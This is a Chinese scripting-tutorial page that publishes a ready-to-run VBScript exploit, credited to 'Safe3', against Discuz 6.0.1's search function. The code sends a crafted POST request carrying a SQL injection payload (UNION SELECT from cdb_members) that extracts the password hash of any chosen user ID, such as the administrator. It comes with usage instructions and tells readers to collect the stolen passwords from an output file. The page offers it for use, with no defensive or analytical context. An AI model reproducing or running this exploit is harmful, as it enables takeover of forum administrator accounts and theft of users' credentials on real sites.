当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > discuz 任意管理员密码漏洞利用工具 vbs代码

VBScript
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Vbs COM之打开/保存文件脚本代码
当某IP 连接我机器的3389端口 报警的脚本
利用WMI实现系统补丁检测分析
vbs 调用中文语音让你电脑听你的命令的实现代码
SQLids.vbs 0.7(最终版,以后改成gui界面的)
vbs 函数 获取数组字符串的最后一个LastOne 挺方便的
枚举域内计算机个数vbscript脚本(没环境,没测试)
VBS 脚本不能运行 提示Windows无法访问指定设备路径或文件
vbs 搜索代理地址实现代码[小偷程序]
vbscript 调用WebService实现代码
VBScript 算一算你从出生到现在共计多少天
VBS操作Excel常见方法
VBS 批量读取文件夹内所有的文本到Excel的脚本
vbs 合并多个excel文件的脚本
自动删除超过10天的文件及文件夹的vbs代码
VBScript 常用函数总结
利用WScript.Shell对象隐藏cmd命令行运行框的实现代码
常用VBS代码 值得一看
进程监控实现代码[vbs+bat]

VBScript 中的 discuz 任意管理员密码漏洞利用工具 vbs代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 62 ::
收藏到网摘: n/a

也利于修改
以下是search.inc.php 文件漏洞利用代码VBS版
复制代码 代码如下:

Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

获得的密码大家自己在result.txt中查找